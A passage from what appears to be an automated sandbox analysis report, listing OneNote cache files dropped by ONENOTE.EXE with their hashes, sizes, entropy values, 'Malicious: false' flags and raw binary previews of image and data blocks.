Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!1....AQ.aq.....".3.5...2B#s.$%..Rr.CS4&6...bE'7.c.DTtU...d.eu...VFfv.Gw.....Wg......................!...1AQaq........"2..4..Rbr#3$...B.s5Cc.S%.D............?..^.f....R.N{.{f.....O.r.V.;U..~...U.(..>M._.yI.{8,..^.t...s`...j.O..U5t.&&..h.G.6Da.;.....J.......E..QD...C...}..N...tR.....~..].J:.V$..r......]...W......4.[.)6..Y_.....4...........m._'HR.a......]U=.....n...0.W..]..K..){.+...w...f...<\|..1/.\|.....b..-..y....]U#Ctn.7m.._.\|..2I;\|....tM....q.q.}.N)....'...9&...nR...R..}.........m._.LZ}u.../K....9.~..?.{....V.#..dx.Zk.:=..:.j].....E#....E~w%....J..[S..[......gr...vb.r]..<..ut..i...[P.w....:..Gkn>......#..m...9km`......t).up.....w....VOR.{&.nQI..}...wD.7Ey#n....MO.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005F.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.613462014279845
Encrypted:	false
SSDEEP:	48:RXqesxAg8rxUptX9IE3/L3AXXXV9u0olrdQqrrDBX2YX9Nua/1:RXqesGxUpsE3/EXnV9u0cRQyXfSq
MD5:	B0A982F51D036E8D66DF437E50BB1EEC
SHA1:	3AD47FE09F12D038A50D2F6EA23656613293C233
SHA-256:	A83837E22B2B7ABBFC7D383342E4FF18D86C6B04F960D9C15C3D0FEBE3B01661
SHA-512:	B1E10DB906B94D6C4FF24A087DDFE9A396AAB7D48A7E79B946EABEF73B21232FCF79E2AA4648445F5B693EE53E4F9DF373DD5D9029287B390352D53F7C15D217
Malicious:	false
Preview:	2...>...........v...~...................................................................................................................................2...>...f.......v................................I.......I.qk..B.....LZ.P.......P.#."..;..9.....P.#."..;..9.....P...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............?q.....a.".......N...^.................T...6K...\V...........f...................................:....I.qk..B.....LZ..............?q.....a.".............?q.....a.".............P.......P.......P...........................................P.j.....P.T.]...P.......P...B...P.H.....P...B...P...>.).P...J...................;........4...4...4.."...............P...P...P...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........P.......P.....#.P.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005G.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
Category:	dropped
Size (bytes):	242903
Entropy (8bit):	7.944495275553473
Encrypted:	false
SSDEEP:	6144:YVxOYlZX2kCWfYoFMXC/sBFC9r+4iEGM4rrcPoWmwkU6FJ:+OwZ2kbFMC/L99ifvokU6/
MD5:	C594A4AA7234EF91E6C2714CFE1410F1
SHA1:	C0F720D4CE3196852814D0B7347F0CAA0C6FD526
SHA-256:	10C833E47BE1C8496F949A6B059C2D79212A4DD66BDE62116EA337FA4FE0B654
SHA-512:	7313F6545A334F9E2DE5430B2DB5C419C4C8A40E075338DAFCD74970BCC6309786946E5DFB57531612BF4C6269495655706D920FD99922FDACFF9796710DA9C0
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:10:32.............................R.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...v&.F;-v;}FH..Z...N..)Y.......h;C....G.0W..ww...MI..Z+..\.........c..4.1.~.Yo.Y6.&. q...............l.A#.~s?yYg..7ky...r

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005H.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.342496368699137
Encrypted:	false
SSDEEP:	96:Y5slGDTYLhVoOZwEXMRKXvvU96d8RQytws:yslBLh6wNXMRKXU96d8RJtw
MD5:	4C08C461E347F9097EC67E5492B510EC
SHA1:	2402516A7C19E374B06198B7C3E3340FD2D559D3
SHA-256:	1D2E4DDF360D923BDF92EC72FA104837C6D6616F63C5E76EA0DE215C6B960445
SHA-512:	BCA7BDE36F8E4BC4752A58A56D298A0E084B50F740AD50EFC1DD172E0E58B42CA8444E1A478C2CB95C68A51E6247EEE9D94A87B29C1DCFC31D0C66D1C6A3DF10
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.........:....".,o.9d..:....".,o.9d....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'............. G........X.z1.....N...^......................N. .<..]k........f........................................I.qk..B.....LZ............ G........X.z1......... G........X.*z1.....................................................................j......T.].............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005I.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
Category:	dropped
Size (bytes):	70028
Entropy (8bit):	7.742089280742944
Encrypted:	false
SSDEEP:	1536:ub4bgbB7g9cKCmSzaNF0jAdAzQKTEFBQqUp/i0yG1pidLHTVX:ub4bIB7Qg2OjbzjgWp/i0yGCZx
MD5:	EC7811912ACA47F6AEB912469761D70D
SHA1:	C759BC2D908705D599B03BDB366C951B11F99A4E
SHA-256:	FBB4573E3BEE1B337077691BEBAE15D6FAC52432405D31396D526D7694A8283D
SHA-512:	881828150993A8C56E36CDA2051D89C1F6E0322643902C9506392C163E8734A2933A46486F40E5BC8C8D0164E180605E52620EF22FE14540AEA787A38B22E98E
Malicious:	false
Preview:	......JFIF.....H.H.....7Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:12:29.............................V.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................}.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....H.yM..? .Z.. .^.x..p.8.A...K.... .\{..)..y....t..=.^y)..v.@.W>. .h.. ..p.:.\)(.$....$.I).....!....E..Z.....&.5.).

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005J.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3239684256869335
Encrypted:	false
SSDEEP:	96:WscwKiYZmE5VQBXSiSENB96g4RQyR9od:WscwnYxXQBXSihB96g4RJPo
MD5:	25B737CCB3C82F3EE53789CB0A0AC6B9
SHA1:	AEE00A320A7456D77487CB8395C8541107C14377
SHA-256:	CE1F9A348CB09C69F5CF9616CC1C426BC21F0405608EC0A2E70D7F48069B013D
SHA-512:	032A7E59EB377ABA9597E83A70BC4DBF2656BD66248B2E21402B83C435C31A6C7C1BCDFC803F31FCF324B8446AD62F69AD73AE04E98A300FDFD14A1C21A4F5CF
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v............................I.......I.qk..B.....LZ.y.......y.\.%...p[NV....y.\.%...p[NV....y...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............7..@.#.)8..\|......N...^................-{.{.E..{.............f........................................I.qk..B.....LZ.............7..@.#.)8..\|...........7..@.#.)8..\|............y.......y.......y...........................................y.j.....y.T.]...y.......y...B...y.H.....y...B...y...>.).y...J...................;........4...4...4.."...............y...y...y...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........y.......y.....#.y.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005K.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
Category:	dropped
Size (bytes):	24268
Entropy (8bit):	6.946124661664625
Encrypted:	false
SSDEEP:	384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
MD5:	3CD906D179F59DDFA112510C7E996351
SHA1:	48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
SHA-256:	1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
SHA-512:	2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005L.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.352811601520681
Encrypted:	false
SSDEEP:	96:8rRsO00E5FTAte+xE4Xzf9C5sRQydPex0Rn01OiU:8rRsx5FT8O4X79C5sRJFeUb
MD5:	8AE7C6E308748779CE8B7A12ECF70E1D
SHA1:	8BE9C2F10082E6A0B12D92C7B2D04C8FFF78EE40
SHA-256:	3259F63117ADCE46C27EA7295A81D4858E3AA1AF4929AD2A32D7798D911A0A16
SHA-512:	58A47E8844F911948413FAE400C4A879FEE087C057AB879C93FED297B38A72F9B8026C152B160B0A1E21EFBFF0FA4AE727D4290A4561C7DD8675D22D7BDEF744
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ.........g......".......g......".........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............j3..)....^..aF.....N...^..................gi..J..-.!T..........f........................................I.qk..B.....LZ............j3..)....^..aF.........j3..)....^..aF.....................................................................j......T.].............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005M.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	47294
Entropy (8bit):	7.497888607667405
Encrypted:	false
SSDEEP:	768:aQ10VrIBdBvDpQrQ7P9/FUOLG2vTSeG9lkCsMKzXeMBk3CBp:aC0JIBL+QsOLG2+ZAC1KqM2I
MD5:	7A450E086AD14BA7D89BA5DB3D3AE6C7
SHA1:	E7AEAFCFCE476390E18C19456BDF6529D863D518
SHA-256:	BDD997068701ED3A00A224EB694B003C01AC69B857FE7B4147D6C34875B1632B
SHA-512:	9B6D50A6CDB6081DA107A2CDDB1BD2811A5764994C8E3F67D56CA81084BE0D068C27435154E867199F38688EA65E8DE02A56DCAC47D0F5E55F0FBB6598814938
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..A..Qa"..q..2.......B#...R%.r...$&b...3Ss.4dU6F.cE..'GC..t..5eufW......................!.1..AQ.aq..".....2BR......r.#3.d...b..Ccs.t......$4T...SD%5Ue&Vf............?..M.7(..).:.a.q.......>..[:O...afQ.uCO..U.....go.l..p..YqVklQ.{i.w&.]Z.\+JQw._.n.'.h..,.bj..X.].k&.Q.>gU..f...1\|....[...jQ.%Zb.......t............V..j.6....Vj..i.....?...IY.P.....$.j........[l.....S.4.J9.U\.......7I..[..=N5....xW..../...=?n....uG.D..S.>...8..3........n.S....]k.*...4.>.R.o..{..l.H.#.^....<amG.m&.......,....wDY.W.m.X....We.IR.Nu...y..Z.l.._S.mr.m...y.]m.R.MT...6.5.5}.K..#%..k].7.Y.q]...%.r.7.R^jR..z.K.T[t.a..d.)glW.r.v,.`....O..^..o:.Uc.\..D....f..D......yt.Q...Y.....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005N.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.454686705423822
Encrypted:	false
SSDEEP:	48:GhTsiVexx+Xltgk7EwLqyFLYcX1vc9e7o1rdQqrjHFLBX3SkxFfd:GhTssXlqWEwW5cX1vc9e70RQyz1t
MD5:	5AE3BB020F5144902CCEE20E41E6D4AC
SHA1:	71B9B1AD0E3FB0C77A59D0148EAE2D162834F63D
SHA-256:	A629BF2F3F996F46B6750971C7CAC6C800153CF8DBA20EC85D0BE7E41C30E4AD
SHA-512:	92393B3430DC6F05BD67E75B39FAB201D8CCE22E51400BF5976D2D0D31293614C6AC38EE396B7788F15741BDB5DDDB0455C2E2853308FBCBC6C5BDA2AAB0EA63
Malicious:	false
Preview:	2...>.......n...v...b...................................................................................................................................2...>...J.......v................................I.......I.qk..B.....LZ2.m.....2.m.u.1....G....2.m.u.1....G....2.m..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............T........a4.x.......N...^................`L..M.@...!>.O.........f........................................I.qk..B.....LZ............T........a4.x...........T........a4.x............2.m.....2.m.....2.m.........................................2.mj....2.mT.]..2.m.....2.m..B..2.mH....2.m..B..2.m..>.)2.m..J...................;........4...4...4.."..............2.m.2.m.2.m..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........2.m.....2.m....#2.m............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005O.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 60 x 336, 4-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	347
Entropy (8bit):	6.85024426015615
Encrypted:	false
SSDEEP:	6:6v/lhPtnlx/QulkWNY2V18A6Akp7eee1VDjMHCyLezyKUX5Gp:6v/7RrIubiA6AkpNhiyKe+
MD5:	78762C169F8B104CB57DFF5A1669D2DF
SHA1:	9638B71B584CD636834016A635ABF8D9C0887711
SHA-256:	E64FDCD0B108737D8B8F7B677029F924031D6BBAA50585D9C3DEF7C7E92ECAF2
SHA-512:	5ED899AAF73B72DEC32E171FFA112382667D5BF3FBA98C92E313E66C0A6975EA97068F4CD32B62283F18DBD5345C11E3610F7EEAC2F2DE71FC44593180B9CEAC
Malicious:	false
Preview:	.PNG........IHDR...<...P.............PLTE......................=l......bKGD....H....cmPPJCmp0712....Om......IDATh......@..aI...B..C..l...^.%.`....>.]..\|0.....a...hb...0......q.......p"....;...K..x=...p...y.yy~J....\|...\.......y..X.......'...>1...Ky..f....&........N`..f0..b...3.......`Z.3..3.....o.......4.&........SV...4.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005P.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.338836585019253
Encrypted:	false
SSDEEP:	48:QBsuEXoWkutm7jE6bXlm9/4zjoxrdQqr8SDBXLk9MKJ:QBsEWkuKEQX49ejIRQy8Ms
MD5:	E703F4D3FED7D4404568C0893787AA0E
SHA1:	6BAB74EE73ECC2C1F1AE17FC6EFF34501AC45D60
SHA-256:	636292183969E21B898CD02287FF18DC9977CCF1DC47C242679F954C4FDAF50A
SHA-512:	E5A2B736B3B303A573626647B058365687463760A7D58BF62814241EDD28177E375F637FF0BF4E8D1E52C6D16BDBAC8D96EFEBD8DDDBB29C432D7EFC3241E6EB
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ.U;......U;..,!....gz....U;..,!....gz....U;..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............`4G@....2...h......N...^..................e..A.....d<.........f........................................I.qk..B.....LZ............`4G@....2...h..........`4G@....2...h............U;......U;......U;..........................................U;j.....U;T.]...U;......U;..B...U;H.....U;..B...U;..>.).U;..J...................;........4...4...4.."...............U;..U;..U;..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........U;......U;....#.U;............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005Q.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 617, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	827
Entropy (8bit):	7.23139555596658
Encrypted:	false
SSDEEP:	12:6v/7Hs2NwBW1mtjeSfaTHHy05riYUtr8y8PQvPYzzg979Reip0QPqc:oOsotazy4rStr8y8PQIzWea0Qv
MD5:	3E675D61F588462FB452342B14BCF9C0
SHA1:	86B62019BC3C5BE48B654256B5D10293FC8C842A
SHA-256:	639EADAD468B6B32B9124B1F4395A8DA3027FF7258D102173BA070AE2ED541AE
SHA-512:	E6EA855B642ED36FA82F8E469A826DC57EB0C36E307045FF8D166F67AF9242C87840833BE31FBE4706DC54100E999D6A3D3A78D0633A3114735818874AD34758
Malicious:	false
Preview:	.PNG........IHDR...(...i..........`PLTE...................................................................................................bKGD....H....cmPPJCmp0712....H.s....qIDATx^...0.Cg.;......@j..2c.=~KP.[H~..@..8...?U.g.n.a=.=.).....3..u^(.....L....5..........8.}..T.f.n.a=.=.).....3..u^(.....L..r....s..8.....W]....,..9..G?.a..`c.z...E.p...)Y.P.....#....@9.7].....,..9..G?.a..`c.z...E.p...)Y.P...`b....0.b.+~{.Pu...1..<..0._.l.@O.y.(...V3%..J....s... .(g.+.qyWu...1..<..0._.l.@O.y.(...V3%...%R.L.Q..x..R.<t.o......7.............:/.E..j.da@i..`b..Z......u.>.?...7.............:/.E..j.da@.Dj..9.W....s. .....:.......L...">w..7... .....:..."...L..."..a....D..Ya.l....E.{.@&.\|.._...7..D..Ya.l.....{.@&.\|....0.J.."z.0s..s....=g ..>........"z.0s..s....=g ..>..l..1...y..g......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005R.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.313209301131809
Encrypted:	false
SSDEEP:	96:OspgxtOppZEXnmXh19iBzERQyso6DlC2cHSl5GSf:OsktesXnmXz9ixERJSDlC2cHSlEs
MD5:	B9EFED21D1CC801895A436BBD7604DF5
SHA1:	1D6F20163A5A42773D0AC42565ABB2B013BAE47C
SHA-256:	9380981C65C259B3B59E4C7F736E1CF927DD22377FDD923D066961D8BDC3FF59
SHA-512:	ACC4365BFA67D52098832B878382E23298D8873D4C307A6B1AEB940C62F29FBD132D4BC78A8D0B230DEEF3BCB3330E4B0ECF89A5D7A7892D629EEE160A2B1FBE
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ..........ih. H...M$....ih. H...M$.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............?.s.O...../........N...^.................z...M..w.q.........f........................................I.qk..B.....LZ.............?.s.O...../.............?.s.O...../........................................................................j......T.].............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005S.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	4410
Entropy (8bit):	7.857636973514526
Encrypted:	false
SSDEEP:	96:E/pQuIhKZ7u06dICH3AroiTe8DGTl55poBUmLNjpH7MvDHjfm:MpdZtPbknnRPpkLNVMvu
MD5:	2494381A1ACDC83843B912CFCDE5643B
SHA1:	98F9D1CC140076D1AE5A9EA19F47658FD5DF0D66
SHA-256:	5EEBE803E434A845D19BC600DF3C75E98BB69BD0DE473CEEC410D1B3A9154E28
SHA-512:	0E64CC3723DC41D94910F7ADFB6A0DFB5049350FD15A873695614E4A89ABD78B166BA4E9C8CB95E275FB56981539DECD2A7F28FBC25E80DD5E2DEA8077CC9489
Malicious:	false
Preview:	.PNG........IHDR...2...X.......E.....PLTE...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B..(....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.].\TU.?3"...(..L........q.Q...H.*j......W..Xd.ie.f..%.XT...em..m.m.vkik...>.}..}\|..{'.U..~......}....s.............,CVu.x.:C..5...;.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005T.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.312235393392324
Encrypted:	false
SSDEEP:	96:YFsErx+xZBkEZnf0LXTp9+IEERQy9HD5N:esErKBxB0LXTp9+vERJ9HD
MD5:	D57CEC88E6695BF5BBE6246A8ED6E264
SHA1:	B32443F0676CC555CA47915B6DF19523E7D94D71
SHA-256:	10AA350F83F725F731BAC13A4E4C2A28645A5D881306F0A3367C095BE1650DD8
SHA-512:	EE1E758838FFE46B3BEBBED6E865B1268357DE68E24DFE814F43679AB5CBE96945F906CAD9C4B3A9091653C3D439F03478296D37CFDA66635D8DC83A3E72D982
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.Vj......Vj......`....).Vj......`....).Vj..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............+T...`z.<[...1~p....N...^................9.\|..K.;....B........f........................................I.qk..B.....LZ............+T...`z.<[...1~p........+T...`z.<[...1~p..........Vj......Vj......Vj..........................................Vjj.....VjT.]...Vj......Vj..B...VjH.....Vj..B...Vj..>.).Vj..J...................;........4...4...4.."...............Vj..Vj..Vj..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........Vj......Vj....#.Vj............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005U.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	136726
Entropy (8bit):	7.973487854173386
Encrypted:	false
SSDEEP:	3072:SIXmy5Tl704vW2ZKkvV8UU0ZWUF0BJwySIdgz816YzDc1+opecYPn:Sny5Tl704fZFV8UU6LGXwyS4xohpQPn
MD5:	4A2472AC2A9434E35701362D1C56EDDF
SHA1:	16FA2EA2D2808D75445896E03B67A93000EEDDD8
SHA-256:	505F731CB7707EFAB2EB06685B392DC7E59265A40B55AAE43E5DC15C0A86CBA4
SHA-512:	5E28D8FB2AC62ED270968072A30013334461F7CAE96058AF9EAA6E10912989DC47112D2133892BF61F7A516B77C6FF71BA2A000B750A9F95C787E538B09595C2
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQaq".....2B....R#..b3...r...C$...X.....Sc...9.%'.(Hs4Dgw..T..5GW.x.)......................!.1..AQa"2.q.......B..#c........b6.Rr.3s$.&..S...C4.%5............?.........(......(......(......(......(......(......(......(.G/.GE&...)..P.x..B.({i2Y;.z?G...Yfc.)H..^....#.....}3..Sc^.H..+...M.a.P.....GS.....H_.3..<....1f........1.<.\..nn-..s.s.\9Y....=.......S.0.......N..cA..Io..r.3..........ay.....K.....,.;9..Q......xO.Fa.2..>........{4k.....\|....?U....3.8..._/3....#.. t.y......yY.......e.<........#.....B.....Z.%.Y..S.ye.W4...l.......X...%.@y}>....l.yi..D..W......L..._D.Q....)...E....n.%...*..K.4#.8`..I....h..h.o..I......-...hB...3..u.(5..........n...,.@....a.t.9.....@.s.>.&...@

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000005V.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.307292703092202
Encrypted:	false
SSDEEP:	48:jesz4wq4RHuFufHHL9tQlmxHddEKHLoZXDdxP9OvoFrdQqrSH9BXH9/v4Hqrvd/D:jeshzr9gmbdEKHcXDdt9OvERQyOhd
MD5:	1AC06F5BAED31EAF8726DF628B86E154
SHA1:	293B4A77AAAF9E6F65994246AB2546CFCFF1AAB9
SHA-256:	7BBC9FE1900BD9D9EB35D8338D6E51A54F4F5722D0F571EEA19077F9797FE8A3
SHA-512:	5569A68A7B6A6C183BEB81C8708FC229DA5CD812C5381C76D59932F3B5AB87173C33C0E79B083C782FB1716318DE90067D3D00B249D4572840767F59966B34D5
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ`.......`.."1.q.0.j..h.Q`.."1.q.0.j..h.Q`....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................0........`......N...^.................I..T.C....a..[........f........................................I.qk..B.....LZ...............0........`.............0........`...........`.......`.......`...........................................`..j....`..T.]..`.......`...B..`..H....`....B..`....>.)`....J...................;........4...4...4.."..............`...`...`....z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........`.......`......#`..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000060.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 77 x 627, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5136
Entropy (8bit):	7.622045262603241
Encrypted:	false
SSDEEP:	96:djzuNKb3XHco17p2wolIxIx7lpskdsC/ddWNKeabJbMojpxLDTu1:VzuNKb397pwlIxKp7qs3bJb5FBTw
MD5:	FA38AFA965141EA3F17863EE8DCCDE61
SHA1:	2B4611E651AF7549C1AA73932B1136B561A7602F
SHA-256:	E1CB1A0EC9BE62D5445C73AA84DF38234002A7E164EE830C9DF24997802CB5D2
SHA-512:	A372674F5CA343321BA9C413D346070709F7685706C9C6C3DC7F61846B59253A5E6FE800DBA10AE870FD3887439B2AA106FBBB51751E92A163938A4393C43E28
Malicious:	false
Preview:	.PNG........IHDR...M...s.....}8nv....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z`.....tRNS...................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000061.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.436144900317224
Encrypted:	false
SSDEEP:	48:zWWDFzsmb7UqxmjzatVsLEBQXLZiL9e9JoxrdQqr4h9zBX7Y2MUqiiuB:FsOUZjza2EaXLA9e9JwRQyCWnUj
MD5:	86CE7ADA28C5089C1211450CAFBA5C3E
SHA1:	918AF4FDFE71BEA24D11B6B6421D7466C9DF0EF1
SHA-256:	22EA295733CABF78A307BB13A938798BFD630417EB5CDC43346D7E9E1C738AA0
SHA-512:	70FC2FA259AD621151C3A90D7F7ACB7057285384CDA80F0D8F648E3C8F1B2E25CDAA9E554A1D577D61C2249D756076673A12B194C3315B2E2A567ACAA3371144
Malicious:	false
